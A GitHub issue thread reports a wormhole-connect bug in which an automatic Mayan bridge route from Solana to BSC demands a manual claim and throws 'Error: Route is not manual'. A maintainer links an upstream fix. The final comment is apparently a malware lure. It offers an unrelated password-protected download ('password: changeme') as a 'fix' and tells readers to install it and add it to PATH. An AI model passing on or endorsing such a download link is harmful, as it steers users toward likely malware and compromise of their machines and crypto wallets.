### ISSUE TITLE
[QA] "Error: Route is not manual" when claiming transaction

### ISSUE THREAD

**Issue by agodlevska** [wormhole-foundation/wormhole-connect#2456]
## Describe the current behavior in detail
Checked on [wormhole-connect-mainnet](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGCmB2BuBcYDkBbAhgS2tSAXJANOGAK4DOkASpACaRkYDm0iuATiZERGwPYm56iANoA6cQBEAogDEAggFUAMgBUA%2BpQDyClVIDKBMAFk0ATzTRK%2FQQF0QAXyA%3D%3D%3D) with macOS Sonoma 14.6.1 and Google Chrome Version 127.0.6533.122 (Official Build) (x86_64).

Steps: 

1. Select Solana network and SOL token in "From" section (Solflare wallet)
2. Select BSC network and BNB token in "To" section (MetaMask wallet)
3. Enter Amount, in my case 0.119
4. Click Review transaction and after Confirm transaction
5. Attempt to claim the transaction.

Expected Result: For an automatic Mayan route, the transaction should proceed without requiring any manual claim actions, completing successfully without errors.

Actual Result: The manual claim required on an automatic route, leading to the console error. 

```
Error: Route is not manual
    at At (main-fsMuFuvz.js:313:87663)
``` 

## Attachments/Notes
<img width="1440" alt="Screenshot 2024-08-28 at 13 19 17" src="https://github.com/user-attachments/assets/eac128b5-c312-42aa-ae77-6877a0ab7074">

**Comment by artursapek** [comment]
This is fixed in https://github.com/mayan-finance/wormhole-sdk-route/pull/39

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
